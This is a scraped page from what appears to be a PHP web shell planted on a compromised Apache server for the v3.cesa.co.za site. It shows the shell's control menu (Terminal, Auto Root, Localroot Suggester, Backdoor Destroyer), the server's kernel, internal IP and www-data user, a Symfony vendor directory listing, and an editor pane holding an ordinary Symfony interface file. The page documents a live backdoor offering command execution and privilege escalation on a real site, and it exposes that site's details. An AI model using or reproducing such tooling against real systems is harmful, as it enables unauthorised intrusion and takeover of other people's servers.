Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
Builder
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Definition
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Exception
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Loader
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Resource
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Util
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
CHANGELOG.md
4.6
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCache.php
1.49
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheFactory.php
1.07
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheFactoryInterface.php
937
B
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheInterface.php
1.24
KB
-rwxrwxr-x
2026-02-24 17:34
FileLocator.php
2.68
KB
-rwxrwxr-x
2026-02-24 17:34
FileLocatorInterface.php
1.1
KB
-rwxrwxr-x
2026-02-24 17:34
LICENSE
1.04
KB
-rwxrwxr-x
2026-02-24 17:34
README.md
596
B
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerConfigCache.php
5.49
KB
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerConfigCacheFactory.php
1.04
KB
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerInterface.php
1.2
KB
-rwxrwxr-x
2026-02-24 17:34
composer.json
1.2
KB
-rwxrwxr-x
2026-02-24 17:34
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config; /** * Interface for a ConfigCache factory. This factory creates * an instance of ConfigCacheInterface and initializes the * cache if necessary. * * @author Matthias Pigulla <mp@webfactory.de> */ interface ConfigCacheFactoryInterface { /** * Creates a cache instance and (re-)initializes it if necessary. * * @param string $file The absolute cache file path * @param callable $callable The callable to be executed when the cache needs to be filled (i. e. is not fresh). The cache will be passed as the only parameter to this callback */ public function cache(string $file, callable $callable): ConfigCacheInterface; }